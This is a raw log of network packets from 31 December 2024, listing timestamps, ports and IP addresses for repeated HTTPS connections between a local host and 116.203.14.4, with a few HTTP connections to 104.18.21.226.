Dec 31, 2024 16:57:50.134638071 CET	443	51513	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:50.591104031 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:50.591165066 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:50.591177940 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:50.591204882 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:50.591222048 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:50.591247082 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:50.592051983 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:50.592061043 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:51.118367910 CET	49729	80	192.168.2.4	104.18.21.226
Dec 31, 2024 16:57:51.118473053 CET	49731	80	192.168.2.4	104.18.21.226
Dec 31, 2024 16:57:51.123512030 CET	80	49729	104.18.21.226	192.168.2.4
Dec 31, 2024 16:57:51.124136925 CET	80	49731	104.18.21.226	192.168.2.4
Dec 31, 2024 16:57:51.124205112 CET	49729	80	192.168.2.4	104.18.21.226
Dec 31, 2024 16:57:51.124218941 CET	49731	80	192.168.2.4	104.18.21.226
Dec 31, 2024 16:57:51.201580048 CET	443	51513	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:51.201653957 CET	443	51513	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:51.201759100 CET	51513	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:51.202652931 CET	51513	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:51.202689886 CET	443	51513	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:51.511512041 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:51.511544943 CET	443	51514	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:51.511635065 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:51.511938095 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:51.511950970 CET	443	51514	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:52.153547049 CET	443	51514	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:52.153618097 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:52.154081106 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:52.154087067 CET	443	51514	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:52.155894995 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:52.155899048 CET	443	51514	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:52.155968904 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:52.155983925 CET	443	51514	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:52.155988932 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:52.155993938 CET	443	51514	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:52.156073093 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:52.156086922 CET	443	51514	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:52.156107903 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:52.156115055 CET	443	51514	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:52.156194925 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:52.156205893 CET	443	51514	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:52.156435013 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:52.156461954 CET	443	51514	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:52.165082932 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:52.165092945 CET	443	51514	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:52.530415058 CET	51515	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:52.530508041 CET	443	51515	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:52.530618906 CET	51515	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:52.530849934 CET	51515	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:52.530885935 CET	443	51515	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:53.171503067 CET	443	51515	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:53.171605110 CET	51515	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:53.172168970 CET	51515	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:53.172178984 CET	443	51515	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:53.173912048 CET	51515	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:53.173928022 CET	443	51515	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:53.431624889 CET	443	51514	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:53.431699038 CET	443	51514	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:53.431725025 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:53.431772947 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:53.432703018 CET	51514	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:53.432717085 CET	443	51514	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:53.551418066 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:53.551460028 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:53.551548958 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:53.551853895 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:53.551865101 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.007673025 CET	443	51515	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.007750988 CET	443	51515	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.007977962 CET	51515	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.008747101 CET	51515	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.008801937 CET	443	51515	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.224658966 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.224822998 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.225604057 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.225616932 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.227415085 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.227421999 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.227509975 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.227528095 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.227535963 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.227545023 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.227577925 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.227585077 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.227672100 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.227694035 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.227740049 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.227754116 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.227781057 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.227802992 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.227842093 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.227854967 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.227916956 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.227931023 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.227957964 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.227972031 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.227997065 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.228008032 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.228055954 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.228065014 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.228091002 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.228101969 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.228111982 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.228120089 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.561971903 CET	51517	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.562047958 CET	443	51517	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:54.562143087 CET	51517	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.562390089 CET	51517	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:54.562412024 CET	443	51517	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:55.206650972 CET	443	51517	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:55.206772089 CET	51517	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:55.207242012 CET	51517	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:55.207273960 CET	443	51517	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:55.208875895 CET	51517	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:55.208905935 CET	443	51517	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:55.209002972 CET	51517	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:55.209037066 CET	443	51517	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:55.209052086 CET	51517	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:55.209069014 CET	443	51517	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:55.227688074 CET	51517	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:55.227730989 CET	443	51517	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:55.227890015 CET	51517	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:55.227920055 CET	443	51517	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:55.513355017 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:55.513433933 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:55.513531923 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:55.513531923 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:55.514467001 CET	51516	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:55.514494896 CET	443	51516	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:55.605818033 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:55.605865955 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:55.605941057 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:55.606170893 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:55.606187105 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.254769087 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.254872084 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.255319118 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.255331993 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.256901979 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.256910086 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.256999969 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.257010937 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.257016897 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.257020950 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.274502993 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.274523020 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.274641991 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.274663925 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.274761915 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.274810076 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.274835110 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.274846077 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.274858952 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.274869919 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.274882078 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.274882078 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.274890900 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.274900913 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.274909019 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.274924994 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.295304060 CET	443	51517	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.295378923 CET	443	51517	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.295420885 CET	51517	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.295505047 CET	51517	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.296240091 CET	51517	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.296279907 CET	443	51517	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.951534033 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.951616049 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:56.951679945 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.952207088 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:56.952244043 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.562356949 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.562427044 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.562452078 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.562475920 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.562494993 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.562513113 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.563220978 CET	51518	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.563232899 CET	443	51518	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.611603022 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.611696959 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.612143040 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.612168074 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614078045 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614106894 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614180088 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614216089 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614228964 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614244938 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614340067 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614378929 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614409924 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614422083 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614500046 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614530087 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614550114 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614550114 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614568949 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614597082 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614639044 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614660978 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614696980 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614713907 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614749908 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614765882 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614799976 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614816904 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614844084 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614856958 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614881992 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614881992 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614902020 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614912033 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614928007 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.614957094 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.614973068 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.615009069 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.615025043 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.615051031 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.615082026 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.615170956 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.615170956 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.615190029 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.615211964 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.615250111 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.615267038 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.615303040 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.615340948 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.615364075 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.615380049 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.615417957 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.615434885 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.615449905 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.615463972 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.615498066 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.615511894 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.615536928 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.615554094 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.615592003 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.615607977 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.615621090 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.615631104 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.913830996 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.913912058 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:57.914007902 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.914278984 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:57.914307117 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:58.561501026 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:58.561589956 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:58.562067986 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:58.562093019 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:58.563760996 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:58.563772917 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:58.563884974 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:58.563922882 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:58.563945055 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:58.563955069 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:58.564050913 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:58.564099073 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:58.564114094 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:58.564126015 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:58.564224005 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:58.564263105 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:58.564306021 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:58.564306974 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:58.564325094 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:58.564377069 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:58.564399004 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:58.564435959 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:58.564455032 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:58.564469099 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:58.564481974 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:59.198164940 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:59.198246002 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:59.198283911 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:59.198344946 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:59.199238062 CET	51519	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:59.199290037 CET	443	51519	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:59.841711998 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:59.841784954 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:59.841809988 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:59.841826916 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:59.841865063 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:59.841886044 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:59.852763891 CET	51520	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:59.852777004 CET	443	51520	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.020554066 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.020617008 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.020684958 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.021045923 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.021068096 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.664736986 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.664829969 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.665318012 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.665328026 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667104959 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667109013 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667167902 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667180061 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667184114 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667187929 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667227983 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667232037 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667284966 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667298079 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667346001 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667356014 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667417049 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667433977 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667464018 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667469978 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667476892 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667480946 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667495966 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667521000 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667550087 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667556047 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667603016 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667615891 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667654037 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667660952 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667668104 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667671919 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667685986 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667689085 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667749882 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667756081 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667772055 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667778969 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667793036 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667797089 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667812109 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667829990 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667867899 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667879105 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667890072 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667901993 CET	51521	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:58:00.667905092 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667921066 CET	443	51521	116.203.14.4	192.168.2.4
Dec 31, 2024 16:58:00.667954922 CET	51521	443	192.168.2.4	116.203.14.4
